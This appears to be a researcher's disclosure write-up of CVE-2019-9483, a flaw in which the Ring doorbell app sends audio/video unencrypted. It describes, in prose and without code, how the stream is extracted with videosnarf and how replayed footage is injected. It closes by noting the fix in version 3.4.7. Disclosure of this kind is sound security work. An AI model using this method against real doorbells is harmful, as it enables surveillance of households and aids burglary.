Plaintext transmission of audio/video footage to the Ring application allows for arbitrary surveillance and injection of counterfeit traffic, effectively compromising home security (CVE-2019-9483).
We moved over to sniffing the application. Here we see a more sensible SIP/TLS approach, with pretty much all notifications, updates and information being passed via HTTPS. However, the actual RTP traffic seems plain!
The data seems sensible, and therefore we might be able to extract it. Using our handy videosnarf utility, we get a viewable MPEG file. This means anyone with access to incoming packets can see the feed! Similarly, we can also extract the audio G711 encoded stream.
Capturing the Doorbell feed is already great, but why stop there when we can inject our own? We developed a POC, whereby we first captured real footage in a so-called “recon mode”. Then, in “active mode” we can drop genuine traffic and inject the acquired footage. This hack works smoothly and is undetectable from within the app. In Mobile World Congress 2019, we publicly demonstrated the attack.
Is it really Jesus at the door?
The attack scenarios possible are far too numerous to list, but for example imagine capturing an Amazon delivery and then streaming this feed. It would make for a particularly easy burglary. Spying on the doorbell allows for gathering of sensitive information – household habits, names and details about family members including children, all of which make the target an easy prey for future exploitation. Letting the babysitter in while kids are at home could be a potentially life threatening mistake.
Are you sure about letting this killer clown in ?
The main takeaway from this research is that security is only as strong as its weakest link. Encrypting the upstream RTP traffic will not make forgery any harder if the downstream traffic is not secure, and encrypting the downstream SIP transmission does not thwart stream interception. When dealing with such sensitive data like a doorbell, secure transmission is not a feature but a must, as the average user will not be aware of potential tampering.
Important note: Ring has patched this vulnerability in version 3.4.7 of the ring app (Without notifying users in the patch notes!). Please make sure to upgrade to a newer version ASAP as the affected versions are still backward compatible and vulnerable.